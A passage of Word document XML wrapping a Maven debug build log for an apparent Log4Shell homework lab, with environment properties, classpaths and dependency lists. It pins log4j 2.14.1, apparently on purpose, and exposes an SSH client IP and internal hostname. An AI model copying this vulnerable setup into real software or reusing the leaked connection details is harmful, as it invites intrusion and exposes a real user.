    <w:p w14:paraId="4F8E23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propertiesEncoding = UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE4555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resources = [Resource {targetPath: null, filtering: false, FileSet {directory: /home/ec2-user/log4shell-homework/src/test/resources, PatternSet [includes: {}, excludes: {}]}}]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AB92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session = org.apache.maven.execution.MavenSession@616b241a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052E56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skip = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC485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supportMultiLineFiltering = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573540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useBuildFilters = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F64B5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(s) useDefaultDelimiters = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B591C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end configuration --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A6C0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properties used {spring-integration.version=5.5.4, flyway.version=7.7.3, java.specification.version=17, webjars-hal-browser.version=3325375, java.vendor.url=https://aws.amazon.com/corretto/, sun.boot.library.path=/usr/lib/jvm/java-17-amazon-corretto.x86_64/lib, sun.java.command=org.codehaus.plexus.classworlds.launcher.Launcher spring-boot:run -X, jdk.debug=release, maven.version=3.8.4, javax-activation.version=1.2.0, kafka.version=2.7.1, jboss-transaction-spi.version=7.6.1.Final, java.vm.specification.vendor=Oracle Corporation, java.specification.name=Java Platform API Specification, byte-buddy.version=1.10.22, maven-install-plugin.version=2.5.2, env.which_declare=declare -f, java.runtime.version=17.0.15+6-LTS, httpclient5.version=5.0.4, env.SELINUX_ROLE_REQUESTED=, java.vendor.version=Corretto-17.0.15.6.1, env.HISTCONTROL=ignoredups, micrometer.version=1.7.4, rxjava-adapter.version=1.2.1, project.baseUri=file:/home/ec2-user/log4shell-homework/, hibernate.version=5.4.32.Final, java.io.tmpdir=/tmp, java.version=17.0.15, javax-persistence.version=2.2, jakarta-ws-rs.version=2.1.6, build-helper-maven-plugin.version=3.2.0, mockito.version=3.9.0, java.vm.specification.name=Java Virtual Machine Specification, infinispan.version=12.1.7.Final, nekohtml.version=1.9.22, maven-assembly-plugin.version=3.3.0, native.encoding=UTF-8, java.library.path=/usr/java/packages/lib:/usr/lib64:/lib64:/lib:/usr/lib, jakarta-servlet.version=4.0.4, java.vendor=Amazon.com Inc., java.specification.maintenance.version=1, thymeleaf-extras-java8time.version=3.0.4.RELEASE, undertow.version=2.2.10.Final, mariadb.version=2.7.4, selenium-htmlunit.version=2.49.1, thymeleaf-extras-data-attribute.version=2.0.1, ehcache3.version=3.9.6, jakarta-xml-bind.version=2.3.3, commons-dbcp2.version=2.8.0, env.LANG=C.UTF-8, mongodb.version=4.2.3, java.vm.specification.version=17, javax-transaction.version=1.3, maven.compiler.source=11, env.BASH_FUNC_which%%=() {  ( alias;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73436B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eval ${which_declare} ) | /usr/bin/which --tty-only --read-alias --read-functions --show-tilde --show-dot "$@"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8F852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user.home=/home/ec2-user, postgresql.version=42.2.23, reactive-streams.version=1.0.3, env.DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus, jmustache.version=1.15, querydsl.version=4.4.0, appengine-sdk.version=1.9.91, thymeleaf-layout-dialect.version=2.5.3, hamcrest.version=2.2, os.version=6.1.134-152.225.amzn2023.x86_64, commons-pool.version=1.6, jakarta-jms.version=2.0.3, jakarta-transaction.version=1.3.3, env.MAIL=/var/spool/mail/ec2-user, java.vm.name=OpenJDK 64-Bit Server VM, maven-help-plugin.version=3.2.0, mimepull.version=1.9.15, json-path.version=2.5.0, jaxen.version=1.2.0, johnzon.version=1.2.14, os.arch=amd64, spring-batch.version=4.3.3, couchbase-client.version=3.1.7, derby.version=10.14.2.0, javax-jsonb.version=1.0, rxjava2.version=2.2.21, javax-jaxws.version=2.3.1, json-smart.version=2.4.7, javax-websocket.version=1.1, commons-codec.version=1.15, caffeine.version=2.9.2, h2.version=1.4.200, env.JAVA_HOME=/usr/lib/jvm/java-17, java.vm.compressedOopsMode=32-bit, pooled-jms.version=1.2.2, unboundid-ldapsdk.version=4.0.14, thymeleaf-extras-springsecurity.version=3.0.4.RELEASE, javax-jaxb.version=2.3.1, sqlite-jdbc.version=3.34.0, jakarta-servlet-jsp-jstl.version=1.2.7, activemq.version=5.16.3, httpasyncclient.version=4.1.4, jtds.version=1.3.1, javax-jms.version=2.0.1, jakarta-websocket.version=1.1.2, env.LOGNAME=ec2-user, spring-security.version=5.5.2, hibernate-validator.version=6.2.0.Final, assertj.version=3.19.0, jakarta-xml-soap.version=1.4.2, influxdb-java.version=2.21, httpcore5.version=5.1.1, lombok.version=1.18.20, maven.compiler.target=11, jakarta-xml-ws.version=2.3.3, env.S_COLORS=auto, library.jansi.path=/usr/share/maven/lib/jansi-native, env.XDG_SESSION_CLASS=user, commons-pool2.version=2.9.0, jackson-bom.version=2.12.5, env.VIRTUAL_ENV=/home/ec2-user/log4shell-homework/venv, spring-retry.version=1.3.1, maven-invoker-</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>plugin.version=3.2.2, maven-antrun-plugin.version=1.8, maven.conf=/usr/share/maven/conf, sun.java.launcher=SUN_STANDARD, resource.delimiter=@, javax-json.version=1.1.4, jboss-logging.version=3.4.2.Final, maven-resources-plugin.version=3.2.0, javax-validation.version=2.0.1.Final, netty.version=4.1.68.Final, jetty-jsp.version=2.2.0.v201112011158, maven-source-plugin.version=3.2.1, jetty.version=9.4.43.v20210629, rxjava.version=1.3.8, elasticsearch.version=7.12.1, java.runtime.name=OpenJDK Runtime Environment, env.XDG_SESSION_ID=8, rest-assured.version=4.3.3, env.SYSTEMD_COLORS=false, maven-deploy-plugin.version=2.8.2, env.MAVEN_CMD_LINE_ARGS= spring-boot:run -X, log4j2.version=2.14.1, maven-failsafe-plugin.version=2.22.2, spring-framework.version=5.3.10, dropwizard-metrics.version=4.1.25, git-commit-id-plugin.version=4.0.5, kotlin-coroutines.version=1.5.2, hazelcast-hibernate5.version=2.2.1, htmlunit.version=2.49.1, env.TERM=xterm-256color, sun.arch.data.model=64, spring-restdocs.version=2.0.5.RELEASE, freemarker.version=2.3.31, thymeleaf.version=3.0.12.RELEASE, jakarta-json.version=1.1.6, janino.version=3.1.6, maven-jar-plugin.version=3.2.0, maven-compiler-plugin.version=3.8.1, java.specification.vendor=Oracle Corporation, rabbit-amqp-client.version=5.12.0, java.version.date=2025-04-15, spring-amqp.version=2.3.10, java.home=/usr/lib/jvm/java-17-amazon-corretto.x86_64, maven-war-plugin.version=3.3.2, jolokia.version=1.6.2, sun.management.compiler=HotSpot 64-Bit Tiered Compilers, jetty-reactive-httpclient.version=1.1.10, env.PATH=/home/ec2-user/log4shell-homework/venv/bin:/home/ec2-user/.local/bin:/home/ec2-user/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin, maven-dependency-plugin.version=3.1.2, httpclient.version=4.5.13, env.LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=01;37;41:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=01;36:*.au=01;36:*.flac=01;36:*.m4a=01;36:*.mid=01;36:*.midi=01;36:*.mka=01;36:*.mp3=01;36:*.mpc=01;36:*.ogg=01;36:*.ra=01;36:*.wav=01;36:*.oga=01;36:*.opus=01;36:*.spx=01;36:*.xspf=01;36:, jsonassert.version=1.5.0, file.encoding=UTF-8, gson.version=2.8.8, sun-mail.version=1.6.7, jakarta-annotation.version=1.3.5, env.HOSTNAME=ip-172-31-46-85.us-east-2.compute.internal, env.SHLVL=1, mssql-jdbc.version=9.2.1.jre8, snakeyaml.version=1.28, okhttp3.version=3.14.9, liquibase.version=4.3.5, httpcore.version=4.4.14, lettuce.version=6.1.5.RELEASE, classworlds.conf=/usr/share/maven/bin/m2.conf, sun.io.unicode.encoding=UnicodeLittle, kotlin.version=1.5.31, wsdl4j.version=1.6.3, tomcat.version=9.0.53, sendgrid.version=4.7.5, env.SSH_CLIENT=76.141.92.20 44903 22, glassfish-jaxb.version=2.3.5, spring-ws.version=3.1.1, commons-lang3.version=3.12.0, os.name=Linux, junit.version=4.13.2, jetty-el.version=9.0.52, env.SELINUX_USE_CURRENT_RANGE=, db2-jdbc.version=11.5.6.0, maven.build.timestamp=2025-05-28T23:35:31Z, env.SSH_CONNECTION=76.141.92.20 44903 172.31.46.85 22, reactor-bom.version=2020.0.11, maven-enforcer-plugin.version=3.0.0, jstl.version=1.2, quartz.version=2.3.2, javax-money.version=1.1, spring-hateoas.version=1.3.4, path.separator=:, env.SHELL=/bin/bash, jakarta-validation.version=2.0.2, env.HISTSIZE=1000, maven.multiModuleProjectDirectory=/home/ec2-user/log4shell-homework, oracle-database.version=21.1.0.0, env.MAVEN_PROJECTBASEDIR=/home/ec2-user/log4shell-</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>homework, java.vm.info=mixed mode, sharing, cassandra-driver.version=4.11.3, env.USER=ec2-user, java.class.version=61.0, xml-maven-plugin.version=1.0.2, sun.jnu.encoding=UTF-8, xmlunit2.version=2.8.2, jakarta-mail.version=1.6.7, slf4j.version=1.7.32, r2dbc-bom.version=Arabba-SR10, solr.version=8.8.2, saaj-impl.version=1.5.3, nimbus-jose-jwt.version=9.10.1, maven.build.version=Apache Maven 3.8.4 (Red Hat 3.8.4-3.amzn2023.0.5), hikaricp.version=4.0.3, maven.home=/usr/share/maven, netty-tcnative.version=2.0.43.Final, maven-shade-plugin.version=3.2.4, sun.stderr.encoding=UTF-8, jakarta-json-bind.version=1.0.2, file.separator=/, line.separator=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F372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sun.stdout.encoding=UTF-8, env.SSH_TTY=/dev/pts/0, spring-kafka.version=2.7.7, jersey.version=2.33, spring.boot.version=2.5.5, user.name=ec2-user, hazelcast.version=4.1.5, env.SELINUX_LEVEL_REQUESTED=, jdom2.version=2.0.6, atomikos.version=4.0.6, aspectj.version=1.9.7, hsqldb.version=2.5.2, ojdbc.version=19.3.0.0, env.XDG_RUNTIME_DIR=/run/user/1000, webjars-locator-core.version=0.46, project.reporting.outputEncoding=UTF-8, env.MOTD_SHOWN=pam, env.XDG_SESSION_TYPE=tty, oauth2-oidc-sdk.version=9.9.1, awaitility.version=4.0.3, env.OLDPWD=/home/ec2-user/log4shell-homework, env.PWD=/home/ec2-user/log4shell-homework, embedded-mongo.version=3.0.0, env.LESSOPEN=||/usr/bin/lesspipe.sh %s, spring-ldap.version=2.3.4.RELEASE, java.class.path=/usr/share/maven/boot/plexus-classworlds-2.6.0.jar, dependency-management-plugin.version=1.0.11.RELEASE, env.HOME=/home/ec2-user, java.vm.vendor=Amazon.com Inc., maven-javadoc-plugin.version=3.2.0, servlet-api.version=4.0.1, rsocket.version=1.1.1, jakarta-persistence.version=2.2.3, artemis.version=2.17.0, groovy.version=3.0.9, javax-cache.version=1.1.1, logback.version=1.2.6, prometheus-pushgateway.version=0.10.0, sun.cpu.endian=little, versions-maven-plugin.version=2.8.1, user.language=en, jedis.version=3.6.3, maven-clean-plugin.version=3.1.0, javax-mail.version=1.6.2, maven-surefire-plugin.version=2.22.2, javax-annotation.version=1.3.2, spring-data-bom.version=2021.0.5, mysql.version=8.0.26, classmate.version=1.5.1, jaybird.version=4.0.3.java8, antlr2.version=2.7.7, selenium.version=3.141.59, glassfish-el.version=3.0.4, project.build.sourceEncoding=UTF-8, jooq.version=3.14.15, java.vendor.url.bug=https://github.com/corretto/corretto-17/issues/, user.dir=/home/ec2-user/log4shell-homework, ehcache.version=2.10.9.2, junit-jupiter.version=5.7.2, java.vm.version=17.0.15+6-LTS, neo4j-java-driver.version=4.2.7, jakarta-activation.version=1.2.2, spring-session-bom.version=2021.0.2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E72AF5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30BD1E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6249FCC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resource with targetPath null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7384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directory /home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B41D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excludes []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEF0B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includes []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A9C34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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B5C4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no use filter components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D379B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961EB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maven-compiler-plugin:3.8.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8740E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Configuring mojo org.apache.maven.plugins:maven-compiler-plugin:3.8.1:testCompile from plugin realm ClassRealm[plugin&gt;org.apache.maven.plugins:maven-compiler-plugin:3.8.1, parent: jdk.internal.loader.ClassLoaders$AppClassLoader@4e0e2f2a]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD118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'org.apache.maven.plugins:maven-compiler-plugin:3.8.1:testCompile' with basic configurator --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAFB1A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basedir = /home/ec2-user/log4shell-homework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223F32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buildDirectory = /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D73DDE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compilePath = [/home/ec2-user/log4shell-homework/target/classes, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-web/2.5.5/spring-boot-starter-web-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter/2.5.5/spring-boot-starter-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot/2.5.5/spring-boot-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-autoconfigure/2.5.5/spring-boot-autoconfigure-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-logging/2.5.5/spring-boot-starter-logging-2.5.5.jar, /home/ec2-user/.m2/repository/ch/qos/logback/logback-classic/1.2.6/logback-classic-1.2.6.jar, /home/ec2-user/.m2/repository/ch/qos/logback/logback-core/1.2.6/logback-core-1.2.6.jar, /home/ec2-user/.m2/repository/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-to-slf4j/2.14.1/log4j-to-slf4j-2.14.1.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1.jar, /home/ec2-user/.m2/repository/org/slf4j/jul-to-slf4j/1.7.32/jul-to-slf4j-1.7.32.jar, /home/ec2-user/.m2/repository/jakarta/annotation/jakarta.annotation-api/1.3.5/jakarta.annotation-api-1.3.5.jar, /home/ec2-user/.m2/repository/org/springframework/spring-core/5.3.10/spring-core-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-jcl/5.3.10/spring-jcl-5.3.10.jar, /home/ec2-user/.m2/repository/org/yaml/snakeyaml/1.28/snakeyaml-1.28.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-json/2.5.5/spring-boot-starter-json-2.5.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-databind/2.12.5/jackson-databind-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-annotations/2.12.5/jackson-annotations-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-core/2.12.5/jackson-core-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jdk8/2.12.5/jackson-datatype-jdk8-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jsr310/2.12.5/jackson-datatype-jsr310-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/module/jackson-module-parameter-names/2.12.5/jackson-module-parameter-names-2.12.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-tomcat/2.5.5/spring-boot-starter-tomcat-2.5.5.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.53/tomcat-embed-core-9.0.53.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-el/9.0.53/tomcat-embed-el-9.0.53.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-websocket/9.0.53/tomcat-embed-websocket-9.0.53.jar, /home/ec2-user/.m2/repository/org/springframework/spring-web/5.3.10/spring-web-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-beans/5.3.10/spring-beans-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-webmvc/5.3.10/spring-webmvc-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-aop/5.3.10/spring-aop-5.3.10.jar, /home/ec2-</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>user/.m2/repository/org/springframework/spring-context/5.3.10/spring-context-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-expression/5.3.10/spring-expression-5.3.10.jar]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1113E7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compileSourceRoots = [/home/ec2-user/log4shell-homework/src/test/java]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43981BC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compilerId = javac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6ECC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debug = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAB2C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encoding = UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D4F3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failOnError = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F96BF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failOnWarning = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0543FD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forceJavacCompilerUse = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6302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fork = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7456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generatedTestSourcesDirectory = /home/ec2-user/log4shell-homework/target/generated-test-sources/test-annotations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131BD86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mojoExecution = org.apache.maven.plugins:maven-compiler-plugin:3.8.1:testCompile {execution: default-testCompile}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E49437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optimize = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAD8BC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outputDirectory = /home/ec2-user/log4shell-homework/target/test-classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD8854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parameters = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7D8D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project = MavenProject: com.example:log4shell-demo:0.0.1-SNAPSHOT @ /home/ec2-user/log4shell-homework/pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A81F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session = org.apache.maven.execution.MavenSession@616b241a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BB87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showDeprecation = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603E44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showWarnings = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD143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skipMultiThreadWarning = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A27D8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source = 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A4CFB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staleMillis = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC0739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target = 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281F743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testPath = [/home/ec2-user/log4shell-homework/target/test-classes, /home/ec2-user/log4shell-homework/target/classes, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-web/2.5.5/spring-boot-starter-web-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter/2.5.5/spring-boot-starter-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot/2.5.5/spring-boot-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-autoconfigure/2.5.5/spring-boot-autoconfigure-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>logging/2.5.5/spring-boot-starter-logging-2.5.5.jar, /home/ec2-user/.m2/repository/ch/qos/logback/logback-classic/1.2.6/logback-classic-1.2.6.jar, /home/ec2-user/.m2/repository/ch/qos/logback/logback-core/1.2.6/logback-core-1.2.6.jar, /home/ec2-user/.m2/repository/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-to-slf4j/2.14.1/log4j-to-slf4j-2.14.1.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1.jar, /home/ec2-user/.m2/repository/org/slf4j/jul-to-slf4j/1.7.32/jul-to-slf4j-1.7.32.jar, /home/ec2-user/.m2/repository/jakarta/annotation/jakarta.annotation-api/1.3.5/jakarta.annotation-api-1.3.5.jar, /home/ec2-user/.m2/repository/org/springframework/spring-core/5.3.10/spring-core-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-jcl/5.3.10/spring-jcl-5.3.10.jar, /home/ec2-user/.m2/repository/org/yaml/snakeyaml/1.28/snakeyaml-1.28.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-json/2.5.5/spring-boot-starter-json-2.5.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-databind/2.12.5/jackson-databind-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-annotations/2.12.5/jackson-annotations-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-core/2.12.5/jackson-core-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jdk8/2.12.5/jackson-datatype-jdk8-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jsr310/2.12.5/jackson-datatype-jsr310-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/module/jackson-module-parameter-names/2.12.5/jackson-module-parameter-names-2.12.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-tomcat/2.5.5/spring-boot-starter-tomcat-2.5.5.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.53/tomcat-embed-core-9.0.53.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-el/9.0.53/tomcat-embed-el-9.0.53.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-websocket/9.0.53/tomcat-embed-websocket-9.0.53.jar, /home/ec2-user/.m2/repository/org/springframework/spring-web/5.3.10/spring-web-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-beans/5.3.10/spring-beans-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-webmvc/5.3.10/spring-webmvc-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-aop/5.3.10/spring-aop-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-context/5.3.10/spring-context-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-expression/5.3.10/spring-expression-5.3.10.jar]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B984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useIncrementalCompilation = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1055F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verbose = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BDBC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end configuration --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FE95B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compiler 'javac'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC2A5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025CFA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40BC5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&lt;&lt;&lt; spring-boot-maven-plugin:2.5.5:run (default-cli) &lt; test-compile @ log4shell-demo &lt;&lt;&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129B28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657FF1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870517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 --- spring-boot-maven-plugin:2.5.5:run (default-cli) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F2D3B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Dependency collection stats {ConflictMarker.analyzeTime=3713108, ConflictMarker.markTime=111989, ConflictMarker.nodeCount=231, ConflictIdSorter.graphTime=224666, ConflictIdSorter.topsortTime=56126, ConflictIdSorter.conflictIdCount=74, ConflictIdSorter.conflictIdCycleCount=0, ConflictResolver.totalTime=5727737, ConflictResolver.conflictItemCount=143, DefaultDependencyCollector.collectTime=254519687, DefaultDependencyCollector.transformTime=9883176}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B1136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org.springframework.boot:spring-boot-maven-plugin:jar:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694172C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org.springframework.boot:spring-boot-buildpack-platform:jar:2.5.5:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDC8C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com.fasterxml.jackson.core:jackson-databind:jar:2.12.5:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0F153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com.fasterxml.jackson.core:jackson-annotations:jar:2.12.5:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AD6C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com.fasterxml.jackson.core:jackson-core:jar:2.12.5:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F18A66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com.fasterxml.jackson.module:jackson-module-parameter-names:jar:2.12.5:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB423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net.java.dev.jna:jna-platform:jar:5.7.0:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCB18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net.java.dev.jna:jna:jar:5.7.0:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166736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org.apache.commons:commons-compress:jar:1.20:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109AA7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org.apache.httpcomponents:httpclient:jar:4.5.13:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1810F6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org.apache.httpcomponents:httpcore:jar:4.4.13:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCBDD4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commons-logging:commons-logging:jar:1.2:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F44F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commons-codec:commons-codec:jar:1.11:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A333C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org.springframework:spring-core:jar:5.3.10:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B05ABA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org.springframework:spring-jcl:jar:5.3.10:runtime</w:t>
      </w:r>
    </w:p>
